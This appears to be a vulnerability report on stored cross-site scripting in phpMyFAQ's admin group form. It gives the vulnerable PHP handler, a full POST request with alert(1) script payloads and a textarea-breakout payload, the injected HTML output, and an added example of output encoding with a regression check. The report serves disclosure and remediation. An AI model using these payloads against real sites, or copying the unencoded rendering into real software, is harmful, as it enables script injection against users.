The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Code:
  if ($groupAction == 'addsave' && $user->perm->hasPermission($user->getUserId(), 'addgroup')) {
      $user = new User($faqConfig);
      $message = '';
      $messages = [];
      // FILTER_UNSAFE_RAW applies no sanitization, so the group name and description
      // reach the template as submitted; the form shown under "Result" then writes
      // them into an attribute value and a <textarea> without HTML encoding.
      $groupName = Filter::filterInput(INPUT_POST, 'group_name', FILTER_UNSAFE_RAW, '');
      $groupDescription = Filter::filterInput(INPUT_POST, 'group_description', FILTER_UNSAFE_RAW, '');
      $groupAutoJoin = Filter::filterInput(INPUT_POST, 'group_auto_join', FILTER_UNSAFE_RAW, '');
      $csrfOkay = true;
      $csrfToken = Filter::filterInput(INPUT_POST, 'csrf', FILTER_UNSAFE_RAW);
      // ... remainder of the handler not included in the report
  }
Request:
POST /admin/?action=group&group_action=addsave HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=EDITthis; cookieconsent_status=dismiss; pmf_sid=34
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://roy.demo.phpmyfaq.de/
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers

csrf=EDITthis&group_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&group_description=%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Payload 1:
</textarea><script>alert(1)</script>
Payload 2:
<script>alert(1)</script>
Result:
  <div>
    <h5>
      <i></i> Group details </h5>
    <form action="?action=group&group_action=update_data" method="post">
      <input id="update_group_id" type="hidden" name="group_id" value="0">
      <div>
        <div>
          <label class="col-lg-3 col-form-label" for="update_group_name">
            Name </label>
          <div>
            <input id="update_group_name" type="text" name="name" class="form-control"
                   tabindex="1" value="<script>alert(1)</script>">
          </div>
        </div>
        <div>
          <label class="col-lg-3 col-form-label" for="update_group_description">
            Description </label>
          <div>
            <textarea id="update_group_description" name="description" class="form-control"
                      rows="3"
                      tabindex="2"></textarea><script>alert(1)</script></textarea>
          </div>
        </div>
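The result above shows the root cause: the values are written into an attribute and a textarea body with no output encoding, so filtering at input time with FILTER_UNSAFE_RAW cannot help. The following is an added example, not phpMyFAQ code, that renders the two fields from the report both the vulnerable way and with htmlspecialchars() applied at the point of output, and runs a simple check over each rendering. The function names, the check and the sample values are constructed for illustration; the sample values are the two payloads from the report.

```php
<?php
// Added example (not phpMyFAQ code): vulnerable vs. encoded rendering of the
// "Group details" form fields, checked against the two payloads in the report.

// Constructed sample input: the two payloads shown above.
$samples = [
    'group_name'        => '<script>alert(1)</script>',
    'group_description' => '</textarea><script>alert(1)</script>',
];

// Output encoding for HTML text and attribute contexts. ENT_QUOTES escapes
// both " and ', so the value cannot break out of a quoted attribute; inside a
// <textarea> body the escaped "<" means "</textarea>" can no longer close the
// element early. ENT_SUBSTITUTE prevents invalid UTF-8 from yielding an empty string.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable rendering: raw values interpolated into markup, as in the
// "Result" section of the report.
function renderGroupFormRaw(string $name, string $description): string
{
    return '<input id="update_group_name" type="text" name="name" value="' . $name . '">'
         . '<textarea id="update_group_description" name="description">' . $description . '</textarea>';
}

// Hardened rendering: every untrusted value passes through esc() exactly
// where it is written into HTML.
function renderGroupFormEscaped(string $name, string $description): string
{
    return '<input id="update_group_name" type="text" name="name" value="' . esc($name) . '">'
         . '<textarea id="update_group_description" name="description">' . esc($description) . '</textarea>';
}

// Check suitable for a regression test: for these inputs a correctly encoded
// page contains no raw "<script" and the textarea is closed exactly once.
function isSafeRendering(string $html): bool
{
    return stripos($html, '<script') === false
        && substr_count(strtolower($html), '</textarea>') === 1;
}

$raw     = renderGroupFormRaw($samples['group_name'], $samples['group_description']);
$escaped = renderGroupFormEscaped($samples['group_name'], $samples['group_description']);

printf("raw rendering passes check:     %s\n", isSafeRendering($raw) ? 'yes' : 'no');
printf("encoded rendering passes check: %s\n", isSafeRendering($escaped) ? 'yes' : 'no');
echo $escaped, "\n";
```

Run with `php example.php`. The raw rendering fails the check because the first payload lands unencoded in the attribute and the second closes the textarea and injects a second script element, exactly as in the captured output; the encoded rendering passes because both payloads are emitted as inert text. In a template engine such as Twig the same effect comes from leaving autoescaping on and never marking these values as safe.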